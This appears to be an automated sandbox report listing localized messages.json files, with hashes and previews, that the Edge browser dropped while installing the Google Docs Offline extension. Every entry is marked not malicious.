                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1658
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                                                                        MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                                                                        SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1672
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                                                                        MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                                                                        SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                                                                        SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):935
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                                                                        MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                                                                        SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                                                                        SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                                                                        SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1065
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                                                                        MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                                                                        SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                                                                        SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2771
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                                                                        MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                                                                        SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):858
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                                                                        MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                                                                        SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                                                                        SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):954
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                                                                        MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                                                                        SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                                                                        SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                                                                        SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):899
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                                                                        MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                                                                        SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                                                                        SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2230
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                                                                        MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                                                                        SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1160
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                                                                        MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                                                                        SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                                                                        SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                                                                        SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3264
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                                                                        MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                                                                        SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                                                                        SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                                                                        SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3235
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                                                                        MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                                                                        SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                                                                        SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
